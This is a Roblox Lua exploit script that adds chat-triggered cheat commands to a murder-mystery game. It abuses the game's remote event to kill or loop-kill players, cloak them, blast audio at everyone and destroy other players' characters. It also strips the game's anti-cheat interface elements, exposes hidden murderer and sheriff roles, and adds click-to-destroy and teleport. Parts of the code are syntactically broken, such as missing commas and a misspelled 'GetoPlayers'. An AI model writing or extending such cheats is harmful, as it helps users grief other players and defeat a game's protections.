_G.SendTMMessage("[XI$TENCE]: [Made by Clad55]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4107880451)
				end
			end
         },
          Gwoosdoom = { 
         Text = "r kdoom",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by Gwoo]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3906641484)
				end
			end
         },
        GankinLamezinsomniac = { 
         Text = "r ddoom",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by GoreDemons]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4512855287)
				end
			end

         },
        do0mshopgay = { 
         Text = "r doom6",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by RussianDog5180]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4394035906)
				end
			end
         },
        firestripe = { 
         Text = "r fst",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by Firestripe]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3455710119 )
				end
			end
         },
       southmemphis = { 
         Text = "r south",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by Darian273]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4380420981)
				end
			end
         },
       trashdoomshopjuuls = { 
         Text = "r trash",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by TrashJuuls]", Color3.new(0,55,120))
        
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4373864380 )
				end
			end
         }, 
       butchaknifecowbell = { 
         Text = "r kbell",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by Blackhavan]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4553144670 )
				end
			end
         }, 
       attheguccistore = { 
         Text = "r gst",
			Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by 9vzy //Blackhavan//]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3058682946 )
				end
			end
         },
       ZILLKAMIgamer = {
         Text = "r zill",
                Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by BloodyRemains]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4431701107 )
				end
			end
         },
       DjHezlashop = {
         Text = "r hezla",
                Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by lorddrizzyd]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4534818584 )
				end
			end
         },
       creepin = {
         Text = "r $aber",
                Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by rikkodia]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 1024224005 )
				end
			end
         },
       aintnotimetoplaynow = {
         Text = "r zone2",
                Apply = function()
				for i, v in ipairs(game.Players:GetPlayers()) do
_G.SendTMMessage("[XI$TENCE]: [Made by wizzera]", Color3.new(0,55,120))

					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4528621671)
				end
			end
         },
       freshoutthetomb = {
         Text = "r tomb",
                Apply = function() 
				for i, v in ipairs(game.Players:GetPlayers()) do
           _G.SendTMMessage("[XI$TENCE]: [Made by GoreDemons]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 3180093499)
				end
			end
         },
       TRENDSSS = {
	Text = "r trends"
		Apply = function()
				for i, v in ipairs(game.Players:GetoPlayers()) do
	   _G.SendTMMessage("[XI$TENCE]: [Made by 1Ramzz]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4948698421)
				end
			end
				 },
       Kayos = {
	 Text = "r kayos"
		Apply = function()
				 for i, v in ipairs(game.Players:GetoPlayers()) do
	   _G.SendTMMessage("[XI$TENCE]: [Made by balance4k]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4956121790)
				end
			end
				 },
				 Ksisss = {
				 Text = "r ksi"
				 Apply = function()
				 for i, v in ipairs(game.Players:GetoPlayers()) do
					_G.SendTMMessage("[XI$TENCE]: [Made by //UNKNOWN//]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4948325482)
					end
					end
				 },
			
				 parkie = {
				 Text = "r park"
				 Apply = function()
				 for i, v in ipairs(game.Players:GetoPlayers()) do
					_G.SendTMMessage("[XI$TENCE]: [Made by //UNKNOWN//]", Color3.new(0,55,120))
					game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players.LocalPlayer, 4686527283)
					end
					end
				 },
				 























	},
	Commands = {
	Kill = {
		Text = ".k",
		Apply = function(Args)
			local Target = GetPlayerFromShortName(Args[2])
			if Target ~= nil then
				game.ReplicatedStorage.Event:FireServer("TPD", (-0.53220192342997) ^ 1.45, Target.Character.Humanoid)
			end
		end
	},
	Invis = {
		Text = ".cl",
		Apply = function(Args)
			local Target = GetPlayerFromShortName(Args[2])
			if Target ~= nil then
				game.ReplicatedStorage.Event:FireServer("Cloak", Target.Character)
			end
		end
	},
	Play = {
		Text = ".r",
		Apply = function(Args)
			local Target = GetPlayerFromShortName(Args[2])
			local ID = Args[3]
			if Target ~= nil and ID ~= "" and ID ~= " " then
				game.ReplicatedStorage.Event:FireServer("PlayRadio", Target, ID)
			end
		end
	},
	LoopKill = {
		Text = ".lk",
		Apply = function(Args)
			print("Fia")
			local Target = GetPlayerFromShortName(Args[2])
			if Target ~= nil then
				table.insert(LKill,Target)		
			end
		end
	},

    },
	UnLoopKill = {
		Text = ".unlk",
		Apply = function(Args)
			print("Fia")
			local Target = GetPlayerFromShortName(Args[2])
			if Target ~= nil then
				local TIndex = 1
				for i, v in pairs(LKill) do
					if v == Target then
						LKill[i] = nil
					end
				end
				for i, v in pairs(LKill) do
					if v ~= nil then
						LKill[TIndex] = v
						TIndex = TIndex + 1
					end
				end
			end
		end
	},
	God = {
		Text = ".god",
		Apply = function(Args)
			local Target = GetPlayerFromShortName(Args[2])
			if Target ~= nil then
				game.ReplicatedStorage.Event:FireServer("TPD", (-0.53220192342997) ^ 1.45, Target.Character.Humanoid)
			end
		end
	}
}

local function UpdateRoles()
	for i,v in pairs(game.Players:GetChildren()) do
		if game.Players[v.Name].Character:FindFirstChild("Role") then
			local role = game.Players[v.Name].Character:FindFirstChild("Role")
			print(v.Name)
			print(role.Value)
			if role.Value == "Murderer" then
				table.insert(Murds,v)
			elseif role.Value == "Sheriff" then
				table.insert(Sherr,v)
			elseif role.Value == "Innocent" then			
				table.insert(Innos,v)
			else
				table.insert(Lobby,v)
			end
		else
			table.insert(Lobby,v)
		end
	end
end

local function StringToArray(String,Separator)
	local Array = {}
	local ExtStr = String
	for i = 0,10 do
		if ExtStr == "" or ExtStr == " " then
			
		else
			local Start = string.find(ExtStr,Separator)
			if Start ~= nil then
				local Arg = string.sub(ExtStr,0,Start-1)
				table.insert(Array,Arg)
				ExtStr = string.sub(ExtStr,Start+1)
			else
				table.insert(Array,ExtStr)
				ExtStr = ""
			end
		end
	end
	if string.lower(Array[1]) == "/e" then
		Array[1] = nil
		for i, v in pairs(Array) do
			if i == 1 then
				
			else
				Array[i-1] = v
			end
		end
	end
	return Array
end

local function Admin(Plr)
	local v = Plr
	v.Chatted:Connect(function(Msg)
		local Args = StringToArray(Msg," ")
		local Executed = false
		for i, v in pairs(LateCmds.SingleCommands) do
			if string.lower(Msg) == string.lower(v.Text) or string.lower(Msg) == "/e ".. string.lower(v.Text) then
				v.Apply()
			end
		end
		if Args[2] ~= nil then
		if string.lower(Args[2]) == "others" then
			for i, v in pairs(LateCmds.Commands) do
				if string.lower(Args[1]) == string.lower(v.Text) then
					for e, p in ipairs(game.Players:GetPlayers()) do
						if p.Name ~= Player.Name then
							Executed = true
							Args[2] = string.sub(p.Name,0,string.len(p.Name)-2)
							v.Apply(Args)
						end
					end
				end
			end
		elseif string.lower(Args[2]) == "all" then
			for i, v in pairs(LateCmds.Commands) do
				if string.lower(Args[1]) == string.lower(v.Text) then
					for e, p in ipairs(game.Players:GetPlayers()) do
						Args[2] = string.sub(p.Name,0,string.len(p.Name)-2)
						v.Apply(Args)
					end
				end
			end
		elseif string.lower(Args[2]) == "murds" then
			UpdateRoles()
			for i, v in pairs(LateCmds.Commands) do
				if string.lower(Args[1]) == string.lower(v.Text) then
					for e, p in pairs(Murds) do
						Args[2] = string.sub(p.Name,0,string.len(p.Name)-2)
						v.Apply(Args)
					end
				end
			end
		elseif string.lower(Args[2]) == "innos" then
			UpdateRoles()
			for i, v in pairs(LateCmds.Commands) do
				if string.lower(Args[1]) == string.lower(v.Text) then
					for e, p in pairs(Innos) do
						Args[2] = string.sub(p.Name,0,string.len(p.Name)-2)
						v.Apply(Args)
					end
				end
			end
		elseif string.lower(Args[2]) == "sherr" then
			UpdateRoles()
			for i, v in pairs(LateCmds.Commands) do
				if string.lower(Args[1]) == string.lower(v.Text) then
					for e, p in pairs(Sherr) do
						Args[2] = string.sub(p.Name,0,string.len(p.Name)-2)
						v.Apply(Args)
					end
				end
			end
		elseif string.lower(Args[2]) == "lobby" then
			UpdateRoles()
			for i, v in pairs(LateCmds.Commands) do
				if string.lower(Args[1]) == string.lower(v.Text) then
					for e, p in pairs(Lobby) do
						Args[2] = string.sub(p.Name,0,string.len(p.Name)-2)
						v.Apply(Args)
					end
				end
			end
		elseif string.lower(Args[2]) == "me" then
			for i, v in pairs(LateCmds.Commands) do
				if string.lower(Args[1]) == string.lower(v.Text) then
					Args[2] = string.sub(Player.Name,0,string.len(Player.Name)-2)
					v.Apply(Args)
				end
			end					
		else
			for i, v in pairs(LateCmds.Commands) do
				if string.lower(Args[1]) == string.lower(v.Text) then
					v.Apply(Args)
				end
			end
		end
		end
	end)
end

Admin(Player)

Mouse.KeyDown:Connect(function(Key)
    if Key == "r" then
        if ClickEnabled == true then
            ClickEnabled = false
        else
            ClickEnabled = true
        end
    elseif Key == "z" then
        for i,v in pairs(Player.Character:GetDescendants()) do
            if v:IsA("Tool") then
                v.Parent = Player
            end
        end
        elseif Key == "x" then
        for i,v in pairs(Player:GetChildren()) do
            if v:IsA("Tool") then
				v.Parent = Player.Backpack
			end
		end
    end
end)

Mouse.Button1Down:Connect(function()
    if ClickEnabled == true then
        if ClickMethod == "dst" then
            Mouse.Target:Destroy()
        elseif ClickMethod == "tp" then
            Player.Character.HumanoidRootPart.CFrame = Mouse.Hit + Vector3.new(0,2.5,0)
        end
    end
end)

LateCmds.Commands.Admin = {
	Text = "Admin",
	Apply = function(Args)
		local Target = GetPlayerFromShortName(Args[2])
		if Target ~= nil then
			Admin(Player)
		end
	end
}

while true do
	wait(0.1)
	if Crashed == true then
		for i,v in pairs(game.Players:GetChildren()) do
            if v.Character ~= nil and v.Name ~= Player.Name and v.Character:FindFirstChild("Torso") ~= nil then
                v.Character.Torso:Destroy()
            end
			game.ReplicatedStorage.Event:FireServer("PlayRadio", v, 491150071)
		end
	end
	if AntiHak == true then
		antiKek={'AntiSpeedHack','AntiDataTheft','UI','NO FF','NO FF'}
		local Player = game.Players.LocalPlayer
		local Gui = Player.PlayerGui
		for i,v in pairs(antiKek) do
			if Gui:FindFirstChild(v) then
				Gui:FindFirstChild(v):Remove()
			end
		end
	end
	for i,v in pairs(game.Players:GetChildren()) do
		if game.Players[v.Name].Character:FindFirstChild("Role") then
			local role = game.Players[v.Name].Character:FindFirstChild("Role")
			if role.Value == "Murderer" then
				game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[v.Name].BGFrame.PlayerName.TextColor3 = Color3.new(1, 0, 0)
			elseif role.Value == "Sheriff" then
				game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[v.Name].BGFrame.PlayerName.TextColor3 = Color3.new(1, 170/255, 0)
			elseif role.Value == "Innocent" then			
				game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[v.Name].BGFrame.PlayerName.TextColor3 = Color3.new(0, 1, 0)
			else
				game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[v.Name].BGFrame.PlayerName.TextColor3 = Color3.new(1, 1, 1)
			end
		else
			game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[v.Name].BGFrame.PlayerName.TextColor3 = Color3.new(1, 1, 1)
		end
	end
	for i, v in pairs(LKill) do
		if v ~= nil and v.Character ~= nil then
			game.ReplicatedStorage.Event:FireServer("TPD", 20000, v.Character:FindFirstChild("Humanoid"))
		end
	end
end
 
















print("------------------Radio commands------------------")
print("-- r beat1")
print("-- r runyomouth")
print("-- r tommyw")
print("-- r DO")
print("-- r fbeat")
print("-- r classic")
print("-- r kidr")
print("-- r flex")
print("-- r supra")
print("-- r hhh")
print("-- r johndoe")
print("-- r mym")
print("-- r cowbell")
print("-- r cowbell2")
print("-- r cowbell3")
print("-- r cowbell4")
print("-- r cowbell5")
print("-- r demon")
print("-- r pop")
print("-- r cute")
print("-- r random")
print("-- r phn")
print("-- r doom1")
print("-- r doom2")
print("-- r doom3")
print("-- r doom4")
print("-- r doom5")
print("-- r warlord")
print("-- r fyk")
print("-- r rdoom")
print("-- r rdoom2")
print("-- r kdoom")
print("-- r Hell")
print("-- r hyperv")
print("-- r gst")
print("-- r $aber")
print("-- r zill")
print("-- r hezla")
print("-- r kbell")
print("-- r notime")
print("-- r tgs")
